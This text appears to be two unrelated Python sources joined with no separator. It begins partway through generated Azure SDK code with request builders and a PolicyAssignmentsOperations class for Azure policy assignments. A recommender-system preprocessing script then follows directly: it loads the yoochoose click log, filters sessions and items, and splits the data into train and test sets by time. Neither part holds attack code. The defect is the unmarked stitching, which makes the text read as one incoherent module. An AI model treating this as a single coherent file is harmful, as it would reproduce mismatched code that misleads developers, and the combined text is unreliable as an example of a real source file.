    content_type = kwargs.pop('content_type', None)  # type: Optional[str]
    api_version = "2016-12-01"
    accept = "application/json, text/json"

    # Fill the path parameters into the URL template.
    url = _format_url_section(
        kwargs.pop("template_url", '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}'),
        scope=_SERIALIZER.url("scope", scope, 'str', skip_quote=True),
        policyAssignmentName=_SERIALIZER.url("policy_assignment_name", policy_assignment_name, 'str'),
    )

    # Query string.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers; Content-Type only when a body content type was supplied.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    if content_type is not None:
        headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="PUT",
        url=url,
        params=params,
        headers=headers,
        json=json,
        content=content,
        **kwargs
    )


def build_get_request(
    scope: str,
    policy_assignment_name: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request for a policy assignment at the given scope."""
    api_version = "2016-12-01"
    accept = "application/json, text/json"

    # Fill the path parameters into the URL template.
    url = _format_url_section(
        kwargs.pop("template_url", '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}'),
        scope=_SERIALIZER.url("scope", scope, 'str', skip_quote=True),
        policyAssignmentName=_SERIALIZER.url("policy_assignment_name", policy_assignment_name, 'str'),
    )

    # Query string.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(method="GET", url=url, params=params, headers=headers, **kwargs)


def build_list_for_resource_group_request(
    resource_group_name: str,
    subscription_id: str,
    *,
    filter: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request listing policy assignments of a resource group."""
    api_version = "2016-12-01"
    accept = "application/json, text/json"

    # Fill the path parameters into the URL template.
    url = _format_url_section(
        kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Authorization/policyAssignments'),
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
    )

    # Query string; $filter is optional and passed through unquoted.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    if filter is not None:
        params['$filter'] = _SERIALIZER.query("filter", filter, 'str', skip_quote=True)
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(method="GET", url=url, params=params, headers=headers, **kwargs)


def build_list_for_resource_request(
    resource_group_name: str,
    resource_provider_namespace: str,
    parent_resource_path: str,
    resource_type: str,
    resource_name: str,
    subscription_id: str,
    *,
    filter: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request listing policy assignments of a single resource."""
    api_version = "2016-12-01"
    accept = "application/json, text/json"

    # Fill the path parameters into the URL template.
    url = _format_url_section(
        kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}/providers/Microsoft.Authorization/policyAssignments'),
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        resourceProviderNamespace=_SERIALIZER.url("resource_provider_namespace", resource_provider_namespace, 'str'),
        parentResourcePath=_SERIALIZER.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
        resourceType=_SERIALIZER.url("resource_type", resource_type, 'str', skip_quote=True),
        resourceName=_SERIALIZER.url("resource_name", resource_name, 'str'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
    )

    # Query string; $filter is optional.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    if filter is not None:
        params['$filter'] = _SERIALIZER.query("filter", filter, 'str')
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(method="GET", url=url, params=params, headers=headers, **kwargs)


def build_list_request(
    subscription_id: str,
    *,
    filter: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request listing all policy assignments of a subscription."""
    api_version = "2016-12-01"
    accept = "application/json, text/json"

    # Fill the path parameters into the URL template.
    url = _format_url_section(
        kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyAssignments'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
    )

    # Query string; $filter is optional.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    if filter is not None:
        params['$filter'] = _SERIALIZER.query("filter", filter, 'str')
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(method="GET", url=url, params=params, headers=headers, **kwargs)


def build_delete_by_id_request(
    policy_assignment_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP DELETE request for a policy assignment addressed by full ID."""
    api_version = "2016-12-01"
    accept = "application/json, text/json"

    # Fill the path parameter into the URL template.
    url = _format_url_section(
        kwargs.pop("template_url", '/{policyAssignmentId}'),
        policyAssignmentId=_SERIALIZER.url("policy_assignment_id", policy_assignment_id, 'str', skip_quote=True),
    )

    # Query string.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(method="DELETE", url=url, params=params, headers=headers, **kwargs)


def build_create_by_id_request(
    policy_assignment_id: str,
    *,
    json: JSONType = None,
    content: Any = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP PUT request that creates a policy assignment addressed by full ID."""
    content_type = kwargs.pop('content_type', None)  # type: Optional[str]
    api_version = "2016-12-01"
    accept = "application/json, text/json"

    # Fill the path parameter into the URL template.
    url = _format_url_section(
        kwargs.pop("template_url", '/{policyAssignmentId}'),
        policyAssignmentId=_SERIALIZER.url("policy_assignment_id", policy_assignment_id, 'str', skip_quote=True),
    )

    # Query string.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers; Content-Type only when a body content type was supplied.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    if content_type is not None:
        headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="PUT",
        url=url,
        params=params,
        headers=headers,
        json=json,
        content=content,
        **kwargs
    )


def build_get_by_id_request(
    policy_assignment_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request for a policy assignment addressed by full ID."""
    api_version = "2016-12-01"
    accept = "application/json, text/json"

    # Fill the path parameter into the URL template.
    url = _format_url_section(
        kwargs.pop("template_url", '/{policyAssignmentId}'),
        policyAssignmentId=_SERIALIZER.url("policy_assignment_id", policy_assignment_id, 'str', skip_quote=True),
    )

    # Query string.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(method="GET", url=url, params=params, headers=headers, **kwargs)

class PolicyAssignmentsOperations(object):
    """PolicyAssignmentsOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.resource.policy.v2016_12_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace
    def delete(
        self,
        scope: str,
        policy_assignment_name: str,
        **kwargs: Any
    ) -> Optional["_models.PolicyAssignment"]:
        """Deletes a policy assignment.

        :param scope: The scope of the policy assignment.
        :type scope: str
        :param policy_assignment_name: The name of the policy assignment to delete.
        :type policy_assignment_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment or None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.PolicyAssignment"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        
        request = build_delete_request(
            scope=scope,
            policy_assignment_name=policy_assignment_name,
            template_url=self.delete.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('PolicyAssignment', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    delete.metadata = {'url': '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}'}  # type: ignore


    @distributed_trace
    def create(
        self,
        scope: str,
        policy_assignment_name: str,
        parameters: "_models.PolicyAssignment",
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Creates a policy assignment.

        Policy assignments are inherited by child resources. For example, when you apply a policy to a
        resource group that policy is assigned to all resources in the group.

        :param scope: The scope of the policy assignment.
        :type scope: str
        :param policy_assignment_name: The name of the policy assignment.
        :type policy_assignment_name: str
        :param parameters: Parameters for the policy assignment.
        :type parameters: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        _json = self._serialize.body(parameters, 'PolicyAssignment')

        request = build_create_request(
            scope=scope,
            policy_assignment_name=policy_assignment_name,
            content_type=content_type,
            json=_json,
            template_url=self.create.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    create.metadata = {'url': '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}'}  # type: ignore


    @distributed_trace
    def get(
        self,
        scope: str,
        policy_assignment_name: str,
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Gets a policy assignment.

        :param scope: The scope of the policy assignment.
        :type scope: str
        :param policy_assignment_name: The name of the policy assignment to get.
        :type policy_assignment_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        # Map well-known failure codes to typed exceptions; callers may extend
        # the mapping through the ``error_map`` keyword.
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))

        http_request = _convert_request(build_get_request(
            scope=scope,
            policy_assignment_name=policy_assignment_name,
            template_url=self.get.metadata['url'],
        ))
        http_request.url = self._client.format_url(http_request.url)

        pipeline_response = self._client._pipeline.run(http_request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Only HTTP 200 is a success for this operation.
        if response.status_code != 200:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)
        return cls(pipeline_response, deserialized, {}) if cls else deserialized

    get.metadata = {'url': '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}'}  # type: ignore


    @distributed_trace
    def list_for_resource_group(
        self,
        resource_group_name: str,
        filter: Optional[str] = None,
        **kwargs: Any
    ) -> Iterable["_models.PolicyAssignmentListResult"]:
        """Gets policy assignments for the resource group.

        :param resource_group_name: The name of the resource group that contains policy assignments.
        :type resource_group_name: str
        :param filter: The filter to apply on the operation.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either PolicyAssignmentListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.paging.ItemPaged[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignmentListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignmentListResult"]
        # Map well-known failure codes to typed exceptions; callers may extend
        # the mapping through the ``error_map`` keyword.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # First page is built from the operation's URL template; later
            # pages reuse the service-supplied continuation link verbatim.
            if not next_link:
                
                request = build_list_for_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=self.list_for_resource_group.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                
                request = build_list_for_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                # Continuation links are always followed with a plain GET
                # (generated-code convention).
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            # Deserialize one page and return (continuation token, items).
            deserialized = self._deserialize("PolicyAssignmentListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            # Fetch a single page; only HTTP 200 is a success.
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response


        return ItemPaged(
            get_next, extract_data
        )
    list_for_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Authorization/policyAssignments'}  # type: ignore

    @distributed_trace
    def list_for_resource(
        self,
        resource_group_name: str,
        resource_provider_namespace: str,
        parent_resource_path: str,
        resource_type: str,
        resource_name: str,
        filter: Optional[str] = None,
        **kwargs: Any
    ) -> Iterable["_models.PolicyAssignmentListResult"]:
        """Gets policy assignments for a resource.

        :param resource_group_name: The name of the resource group containing the resource. The name is
         case insensitive.
        :type resource_group_name: str
        :param resource_provider_namespace: The namespace of the resource provider.
        :type resource_provider_namespace: str
        :param parent_resource_path: The parent resource path.
        :type parent_resource_path: str
        :param resource_type: The resource type.
        :type resource_type: str
        :param resource_name: The name of the resource with policy assignments.
        :type resource_name: str
        :param filter: The filter to apply on the operation.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either PolicyAssignmentListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.paging.ItemPaged[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignmentListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignmentListResult"]
        # Map well-known failure codes to typed exceptions; callers may extend
        # the mapping through the ``error_map`` keyword.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # First page is built from the operation's URL template; later
            # pages reuse the service-supplied continuation link verbatim.
            if not next_link:
                
                request = build_list_for_resource_request(
                    resource_group_name=resource_group_name,
                    resource_provider_namespace=resource_provider_namespace,
                    parent_resource_path=parent_resource_path,
                    resource_type=resource_type,
                    resource_name=resource_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=self.list_for_resource.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                
                request = build_list_for_resource_request(
                    resource_group_name=resource_group_name,
                    resource_provider_namespace=resource_provider_namespace,
                    parent_resource_path=parent_resource_path,
                    resource_type=resource_type,
                    resource_name=resource_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                # Continuation links are always followed with a plain GET
                # (generated-code convention).
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            # Deserialize one page and return (continuation token, items).
            deserialized = self._deserialize("PolicyAssignmentListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            # Fetch a single page; only HTTP 200 is a success.
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response


        return ItemPaged(
            get_next, extract_data
        )
    list_for_resource.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}/providers/Microsoft.Authorization/policyAssignments'}  # type: ignore

    @distributed_trace
    def list(
        self,
        filter: Optional[str] = None,
        **kwargs: Any
    ) -> Iterable["_models.PolicyAssignmentListResult"]:
        """Gets all the policy assignments for a subscription.

        :param filter: The filter to apply on the operation.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either PolicyAssignmentListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.paging.ItemPaged[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignmentListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignmentListResult"]
        # Map well-known failure codes to typed exceptions; callers may extend
        # the mapping through the ``error_map`` keyword.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # First page is built from the operation's URL template; later
            # pages reuse the service-supplied continuation link verbatim.
            if not next_link:
                
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                # Continuation links are always followed with a plain GET
                # (generated-code convention).
                request.method = "GET"
            return request

        def extract_data(pipeline_response):
            # Deserialize one page and return (continuation token, items).
            deserialized = self._deserialize("PolicyAssignmentListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            # Fetch a single page; only HTTP 200 is a success.
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response


        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyAssignments'}  # type: ignore

    @distributed_trace
    def delete_by_id(
        self,
        policy_assignment_id: str,
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Deletes a policy assignment by ID.

        When providing a scope for the assignment, use '/subscriptions/{subscription-id}/' for
        subscriptions, '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}' for
        resource groups, and
        '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/{resource-provider-namespace}/{resource-type}/{resource-name}'
        for resources.

        :param policy_assignment_id: The ID of the policy assignment to delete. Use the format
         '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policy-assignment-name}'.
        :type policy_assignment_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        # Map well-known failure codes to typed exceptions; callers may extend
        # the mapping through the ``error_map`` keyword.
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))

        http_request = _convert_request(build_delete_by_id_request(
            policy_assignment_id=policy_assignment_id,
            template_url=self.delete_by_id.metadata['url'],
        ))
        http_request.url = self._client.format_url(http_request.url)

        pipeline_response = self._client._pipeline.run(http_request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Only HTTP 200 is a success for this operation.
        if response.status_code != 200:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)
        return cls(pipeline_response, deserialized, {}) if cls else deserialized

    delete_by_id.metadata = {'url': '/{policyAssignmentId}'}  # type: ignore


    @distributed_trace
    def create_by_id(
        self,
        policy_assignment_id: str,
        parameters: "_models.PolicyAssignment",
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Creates a policy assignment by ID.

        Policy assignments are inherited by child resources. For example, when you apply a policy to a
        resource group that policy is assigned to all resources in the group. When providing a scope
        for the assignment, use '/subscriptions/{subscription-id}/' for subscriptions,
        '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}' for resource groups,
        and
        '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/{resource-provider-namespace}/{resource-type}/{resource-name}'
        for resources.

        :param policy_assignment_id: The ID of the policy assignment to create. Use the format
         '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policy-assignment-name}'.
        :type policy_assignment_id: str
        :param parameters: Parameters for policy assignment.
        :type parameters: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        # Map well-known failure codes to typed exceptions; callers may extend
        # the mapping through the ``error_map`` keyword.
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        # Serialize the model into its JSON wire format before building the request.
        body = self._serialize.body(parameters, 'PolicyAssignment')

        http_request = _convert_request(build_create_by_id_request(
            policy_assignment_id=policy_assignment_id,
            content_type=content_type,
            json=body,
            template_url=self.create_by_id.metadata['url'],
        ))
        http_request.url = self._client.format_url(http_request.url)

        pipeline_response = self._client._pipeline.run(http_request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # The service answers a successful create with HTTP 201 only.
        if response.status_code != 201:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)
        return cls(pipeline_response, deserialized, {}) if cls else deserialized

    create_by_id.metadata = {'url': '/{policyAssignmentId}'}  # type: ignore


    @distributed_trace
    def get_by_id(
        self,
        policy_assignment_id: str,
        **kwargs: Any
    ) -> "_models.PolicyAssignment":
        """Gets a policy assignment by ID.

        When providing a scope for the assignment, use '/subscriptions/{subscription-id}/' for
        subscriptions, '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}' for
        resource groups, and
        '/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/{resource-provider-namespace}/{resource-type}/{resource-name}'
        for resources.

        :param policy_assignment_id: The ID of the policy assignment to get. Use the format
         '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policy-assignment-name}'.
        :type policy_assignment_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PolicyAssignment, or the result of cls(response)
        :rtype: ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PolicyAssignment"]
        # Map well-known failure codes to typed exceptions; callers may extend
        # the mapping through the ``error_map`` keyword.
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))

        http_request = _convert_request(build_get_by_id_request(
            policy_assignment_id=policy_assignment_id,
            template_url=self.get_by_id.metadata['url'],
        ))
        http_request.url = self._client.format_url(http_request.url)

        pipeline_response = self._client._pipeline.run(http_request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Only HTTP 200 is a success for this operation.
        if response.status_code != 200:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('PolicyAssignment', pipeline_response)
        return cls(pipeline_response, deserialized, {}) if cls else deserialized

    get_by_id.metadata = {'url': '/{policyAssignmentId}'}  # type: ignore


# -*- coding: utf-8 -*-
"""
Created on Fri Jun 25 16:20:12 2015

@author: Balázs Hidasi
@lastmodified: Loreto Parisi (loretoparisi at gmail dot com)
"""

import sys
import os
import numpy as np
import pandas as pd
import datetime as dt

# To redirect output to file
class Logger(object):
    """Tee-style stream: echoes every write to the real stdout and appends it
    to a log file.  Assign an instance to ``sys.stdout`` to capture output.

    :param filename: path of the log file (opened in append mode).
    """
    def __init__(self, filename="Default.log"):
        self.terminal = sys.stdout      # original stdout, kept for echoing
        self.log = open(filename, "a")  # NOTE: held open for the process lifetime
    def write(self, message):
        self.terminal.write(message)
        self.log.write(message)
    def flush(self):
        # Previously a no-op: buffered log lines could be lost on a crash and
        # print(..., flush=True) had no effect.  Flush both streams instead.
        self.terminal.flush()
        self.log.flush()
# Tee all subsequent print() output into $HOME/theano.log as well as the terminal.
sys.stdout = Logger( os.environ['HOME' ] + '/theano.log' )

# Input and output both default to the user's home directory.
PATH_TO_ORIGINAL_DATA = os.environ['HOME'] + '/'
PATH_TO_PROCESSED_DATA = os.environ['HOME'] + '/'

# Load the RecSys Challenge 2015 click log; columns 0-2 are session id,
# timestamp string and item id.
data = pd.read_csv(PATH_TO_ORIGINAL_DATA + 'yoochoose-clicks.dat', sep=',', header=None, usecols=[0,1,2], dtype={0:np.int32, 1:str, 2:np.int64})
data.columns = ['SessionId', 'TimeStr', 'ItemId']
data['Time'] = data.TimeStr.apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%dT%H:%M:%S.%fZ').timestamp()) #This is not UTC. It does not really matter.
del(data['TimeStr'])

# Filter iteratively: drop length-1 sessions, then items with support < 5,
# then re-check session lengths (item removal may have shortened sessions).
session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>1].index)]
item_supports = data.groupby('ItemId').size()
data = data[np.in1d(data.ItemId, item_supports[item_supports>=5].index)]
session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>=2].index)]

# Time-based split: sessions ending in the final day (86400 s) form the test
# set; test items unseen in training are dropped, and test sessions must still
# contain at least 2 events afterwards.
tmax = data.Time.max()
session_max_times = data.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_test = session_max_times[session_max_times >= tmax-86400].index
train = data[np.in1d(data.SessionId, session_train)]
test = data[np.in1d(data.SessionId, session_test)]
test = test[np.in1d(test.ItemId, train.ItemId)]
tslength = test.groupby('SessionId').size()
test = test[np.in1d(test.SessionId, tslength[tslength>=2].index)]
